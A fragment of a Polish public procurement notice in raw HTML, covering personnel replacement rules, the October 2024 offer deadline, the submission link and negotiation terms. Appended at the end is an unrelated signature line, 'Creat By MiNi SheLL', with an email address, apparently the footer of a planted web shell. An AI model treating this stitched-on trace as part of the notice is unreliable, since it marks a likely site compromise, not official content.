Wykonawcę lub wprowadzenie nowej osoby do realizacji zamówienia (w trakcie realizacji Umowy), możliwa jest wyłącznie za zgodą Zamawiającego, w sytuacji gdy nowa, wskazana przez Wykonawcę osoba spełnia te same warunki określone w zapytaniu ofertowym oraz uzyska co najmniej taką samą liczbę punktów.<br/><br/>3. Zamawiający może w każdym czasie zażądać od Wykonawcy zmiany osoby wskazanej przez Wykonawcę do realizacji zamówienia (w trakcie realizacji zamówienia), w sytuacji, gdy powstaną uzasadnione wątpliwości co do kwalifikacji i kompetencji tej osoby. Wykonawca zobowiązany będzie dokonać zmiany osoby na żądanie Zamawiającego niezwłocznie od daty otrzymania żądania. Nowa, wskazana przez Wykonawcę osoba, musi posiadać kompetencje i doświadczenie nie gorsze niż te określone w zapytaniu ofertowym oraz uzyska co najmniej taką samą liczbę punktów. Zamawiający w terminie nie dłuższym niż 14 dni od daty otrzymania od Wykonawcy propozycji nowej osoby, dokona weryfikacji jej kompetencji i doświadczenia oraz wyrazi zgodę lub odmówi zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-17 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://asystent.postepowania.pl/org/wgpr/org/zosprp/postepowania/1535</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-17 13:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com